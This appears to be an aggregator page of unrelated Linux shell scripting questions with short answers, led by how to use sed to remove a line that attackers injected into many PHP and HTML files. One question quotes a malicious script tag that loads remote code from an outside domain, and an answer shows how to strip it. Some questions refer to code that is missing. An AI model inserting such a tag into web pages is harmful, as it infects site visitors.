Security :: Using Sed To Remove A Line From All Files In Directory
Jan 23, 2010
A JavaScript line has crept into all the HTML and PHP files in my shared hosting account. I have SSH access. How can I use sed to remove that line from all files in a directory recursively? By default sed doesn't change the original file, and I need to target both *.php and *.html.
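For reference, one common approach (a sketch; evil.example stands in for the actual injected string, and GNU sed's -i edits files in place, so back them up first):
Code:
# Delete any line containing the injected pattern from all .php and .html
# files under the current directory, recursively.
find . -type f \( -name '*.php' -o -name '*.html' \) \
    -exec sed -i '/evil\.example/d' {} +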
I have two questions: How do I remove files from Directory A if their name appears in Directory B? And how do I move foo.jpg and bar.jpg from Directory C to Directory D if and only if foo.png and bar.png appear in Directory D? I suspect there's probably a bash one-liner for this, but I can't come up with it.
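A hedged sketch of both, with dirA, dirB, dirC, and dirD as placeholder paths:
Code:
# 1) Remove files from dirA whose names also appear in dirB.
for f in dirB/*; do
    rm -f "dirA/$(basename "$f")"
done
# 2) Move each .jpg from dirC to dirD only if the matching .png is already there.
for f in dirC/*.jpg; do
    base=$(basename "$f" .jpg)
    [ -e "dirD/$base.png" ] && mv "$f" dirD/
done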
My site was recently hacked and a line of <JAVASCRIPT> was inserted into all my PHP files. Is there a way to pull just that one line out of all the PHP files on the server? I was thinking of using grep -iR <CODE> *.php and then piping through sed.
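That pipeline works; a sketch (INJECTED_PATTERN is a placeholder for the actual string, with any regex metacharacters escaped):
Code:
# grep -l lists only the names of matching files (-Z NUL-terminates them so
# xargs -0 is safe with odd file names); sed then deletes the line in place.
grep -lRZ 'INJECTED_PATTERN' --include='*.php' . | xargs -0 sed -i '/INJECTED_PATTERN/d'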
I have a (hopefully) quick question regarding some scripting I used to do under a DOS/Windows environment. I used to use the "for" command to iterate through a set of files in a directory with the line:
Code: for each %1 in ([dir]) do [command]
But that doesn't work under bash. I presume the syntax is slightly different, but
Code: for --help or Code: man for
doesn't give me much information as to syntax or usage. I'm sure there is something in bash or the standard shell; I just can't seem to find it.
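For what it's worth, 'for' is a shell builtin, which is why 'man for' finds nothing; 'help for' documents it. The bash equivalent of the DOS loop looks like this (a sketch; the path and command are placeholders):
Code:
# Iterate over every entry in a directory and run a command on each one.
for f in /path/to/dir/*; do
    echo "processing $f"    # replace echo with the desired command
done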
Where exactly are temporary files stored, in /tmp or /var/tmp? How can I remove temporary files from the command line? What is the difference between these two directories?
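Briefly: /tmp is typically cleared at boot, while /var/tmp persists across reboots. A hedged cleanup sketch (adjust the age and path before running, usually as root):
Code:
# List, then remove, regular files under /tmp not modified for over 7 days.
find /tmp -type f -mtime +7 -print
find /tmp -type f -mtime +7 -exec rm -f {} +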
I am still a novice with Ubuntu and I am trying to write a shell script which will clean up redundant files. I am stuck on one line where I need a command that will remove all files from a directory except some of them. Can anyone please advise how to add such an exception to the rm command? I have searched some bash shell tutorials, however, no joy. I guess I have overlooked something.
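One way to express the exception is to let find do the filtering instead of rm (a sketch; the kept names are placeholders):
Code:
# Delete every regular file in the directory except the two named files.
find /path/to/dir -maxdepth 1 -type f \
    ! -name 'keep-this.conf' ! -name 'keep-that.log' -exec rm -f {} +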
I was preparing a script which will remove all files from a directory that are more than 24 hours old. I tried something like this: find . ( -name 'log.*' -mtime +1 ) -exec rm {}; but it is throwing an error like: missing argument to -exec.
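The shell consumes the unescaped parentheses and semicolon before find ever sees them, which is what produces the "missing argument to -exec" error. Escaped, the same command runs:
Code:
# Remove log.* files last modified more than one day ago.
find . \( -name 'log.*' -mtime +1 \) -exec rm {} \;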
I need a PHP script to delete a line with certain pattern from all filesin a directory. The Directory contain files with extensions .js,.html and.php. Do any body give a working code snippet to Read all files in a directory with above extension and delete that line from the files.
I would like to create a cronjob that will delete all files within a directory one hour after they are created. I found this cron: find /path/to/file/* -ctime +1 -exec rm {} ; but it deletes all files. I want to make an exception: all files should be deleted except one (let's say a.zip).
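A sketch of the corrected find invocation: -ctime +1 means older than one day, so use -cmin +60 for one hour, and exclude the file by name:
Code:
# Delete files changed more than 60 minutes ago, but spare a.zip.
find /path/to/file/ -type f -cmin +60 ! -name 'a.zip' -exec rm -f {} +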
I'm able to use the following to remove the target directory and recursively all of its subdirectories and contents. find '/target/directory/' -type d -name '*' -print0 | xargs -0 rm -rf
However, I do not want the target directory to be removed. How can I remove just the files in the target, the subdirectories, and their contents?
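With GNU find this is one option (a sketch):
Code:
# -mindepth 1 skips the target directory itself, so only its contents
# (files and subdirectories) are deleted.
find /target/directory/ -mindepth 1 -delete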
Our client accounts were recently injected with the following script. Since there are so many files that were injected (only index.php and index.html), how can this script be traced with a search command and removed from all the files found?
I need to copy all subdirectories and files from one directory to another every 5 minutes or so, with the old data automatically being overwritten by the new data. I'd also like this to run at startup. Is there any way this can be done? If so, what program would I need to schedule the automation, and what is the command line I would need?
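One plausible setup is rsync driven by cron (a sketch; paths are placeholders, and the @reboot entry depends on a vixie-cron/cronie-style cron):
Code:
# Add via 'crontab -e'. -a copies recursively, preserving attributes;
# --delete makes the destination an exact mirror of the source.
*/5 * * * * rsync -a --delete /source/dir/ /dest/dir/
@reboot     rsync -a --delete /source/dir/ /dest/dir/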
I just got an email from Google saying my site contained malware. It has a line in it: "<script src='http://whitepix.info/3'></script>". I've noticed it appears recursively in all the .html and .txt files on my website. Can I write a Linux script that will go through all my .html and .txt files recursively and delete that line from them? I don't know how it got into all of them.
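A sketch of such a script, using '.' wildcards in the sed pattern for the quote characters around the URL to sidestep shell quoting (back up the files first):
Code:
# Strip the injected tag from every .html and .txt file, recursively.
find . -type f \( -name '*.html' -o -name '*.txt' \) \
    -exec sed -i 's|<script src=.http://whitepix\.info/3.></script>||g' {} +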
I am trying to write a program in C which compares two files and prints the line that is equal.
Here file1.txt has
and file2.txt has
Note: file2.txt consists of only a single string, whereas file1.txt has multiple lines. Actually I'm comparing two files with md5sum values.
Here is the code, but it compares only the first line of each file. Sorry, I am a beginner in C; can anyone suggest some modifications to this code so that it can compare file2 with the entire file1?
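Not a fix for the C code itself, but a shell one-liner that shows the expected result and can serve as a cross-check:
Code:
# Print every line of file1.txt that exactly matches a line of file2.txt.
# -F: fixed strings, -x: whole-line match, -f: read the patterns from file2.txt.
grep -Fxf file2.txt file1.txt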
How would I go about copying files to a directory, yet skipping the files that already exist in the directory, and also removing the files that are in the directory? For example:
Code:
$ ls /dir1
img001.jpg img002.jpg
[code]....
Now I would like to copy from dir1 to dir2, but the contents of dir2 would be:
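Two hedged options for the copy-but-skip-existing part:
Code:
# -n ("no clobber") skips files that already exist in dir2.
cp -n /dir1/* /dir2/
# rsync does the same and can report what was copied or skipped.
rsync -av --ignore-existing /dir1/ /dir2/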
There are millions of files in many directories. Whenever I try rm *, or find, or xargs, they say 'argument list too long' and exit. How can I delete the files in a directory with so many files, without deleting the directory itself?
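A sketch that avoids the limit: the 'argument list too long' error comes from the shell expanding * into one huge command line, whereas find executes rm itself:
Code:
# Delete the files without ever building a giant argument list,
# leaving the directory itself in place.
find /path/to/dir -mindepth 1 -type f -exec rm -f {} +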
I have two txt files containing x and y coordinates: xcoord.txt and ycoord.txt. I need to open them and read them line by line to get each coordinate; then each time I need to update the Xs and Ys parameters inside another file called "dc.in" with the grabbed values.
Finally, each time I need to run two exe files (dc_2002 and st_vac) and produce the corresponding output for each Xs and Ys (dc.in is an input file for these exe files).
I have written the following code but it does not work:
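A sketch of one way to structure the loop, assuming dc.in holds lines such as "Xs = <value>" and "Ys = <value>" (adjust the sed expressions to the real dc.in format):
Code:
# Read the coordinate files in parallel, patch dc.in, and run both programs.
paste xcoord.txt ycoord.txt | while read -r x y; do
    sed -i "s/^Xs = .*/Xs = $x/; s/^Ys = .*/Ys = $y/" dc.in
    ./dc_2002    # run both programs on the updated dc.in
    ./st_vac
done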
I have a big CSV file which is not formatted very well. I have cleaned it up by removing a lot of HTML etc., but some of the lines break where they are not supposed to. What I want to do is check the next line: if it starts with 'PX' I don't want to do anything, but if it does not start with 'PX' I want to merge the two lines, that is, remove the newline character on line one and replace it with a space. Can this be done with sed? (Or maybe with Perl or something, but I'm more familiar with sed.) I've been looking around the net for a solution, but with no result.
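It can be done with sed alone; a sketch (GNU sed), which joins any line to its successor whenever that successor does not start with PX:
Code:
# :a              label for the loop
# $!N             append the next line to the pattern space (except at end of input)
# /\nPX/!s/\n/ /  if it does not start with PX, replace the newline with a space
# ta              loop to pick up further continuation lines
# P;D             otherwise print the finished line and carry the PX line forward
sed -e ':a' -e '$!N' -e '/\nPX/!s/\n/ /' -e 'ta' -e 'P' -e 'D' input.csv > cleaned.csv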
I'm extracting data from an XML file, writing it to separate files, then combining the results into a CSV file. The problem is keeping the separate files in sync line by line. When a grep finds no match, I would like to put in a blank line or something to keep the lines in order. When the <title> is missing, as in the first <programme> ... </programme>, that's where I need something to write to the file as dummy data to keep the line count in step.
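One way to keep the counts in step (a sketch, assuming one record is processed at a time; record.xml and titles.txt are placeholder names): grep exits non-zero when nothing matches, so a fallback echo can supply the dummy line:
Code:
# Append the matched <title> line, or an empty placeholder if there is none,
# so titles.txt stays aligned with the other per-record files.
grep '<title>' record.xml >> titles.txt || echo '' >> titles.txt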
I'm a bit new to Python programming and hoped that someone might be able to help with a problem I'm having. What I essentially want to do is to combine two text files line for line. I know how to do this in a bash script so to give you a better idea here's the code for that:
Code:
This is basically for adding on values to the end of a CSV file that uses ';' as the delimiter. So say file1 said:
And file2 said:
Then running this command would create merged_file1_and_file2 which would be:
The code I'm using at the moment is:
Code:
As I'm sure any experienced Python programmer will see, this prints out the first line of the file "csvraw", then all of the lines of "stamps", and then the remainder of "csvraw".
What I'd like to do is something like: (pseudocode, I know it's not Python ;-))
Code:
Is this possible? I've tried googling and my Python Pocket Reference hasn't been much help. I've looked at pickling but that doesn't seem appropriate.
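For reference, the shell version of this merge is a one-liner, and in Python the usual idiom is to zip() the two open file objects and process them line by line rather than pickling anything:
Code:
# Join the two files line by line with ';' between them.
paste -d ';' file1 file2 > merged_file1_and_file2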
If I leave the computer running for a few minutes without doing anything on it, this screen appears demanding that I enter my password, otherwise I can't get back to Fedora. I understand the necessity for this security feature in a work environment, but I'm just a home user and this security screen is just a nagging problem I don't know how to get rid of.
I have two files (not sorted) and need to compare them line by line (i.e., the first line of file1 is to be compared with all the lines of file2, and so on for the rest of file1). The output will be an array of the length of file2. Any suggestion in BASH other than a grep inside two read-line loops (which is time consuming for files of ~1000s of lines)?
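One pass with awk should be far faster than nested read loops (a sketch, printing 1 or 0 per line of file2 according to whether that line occurs anywhere in file1):
Code:
# Load every line of file1 into a lookup table, then test each line of file2.
awk 'NR==FNR { seen[$0] = 1; next } { print (($0 in seen) ? 1 : 0) }' file1 file2 > result.txt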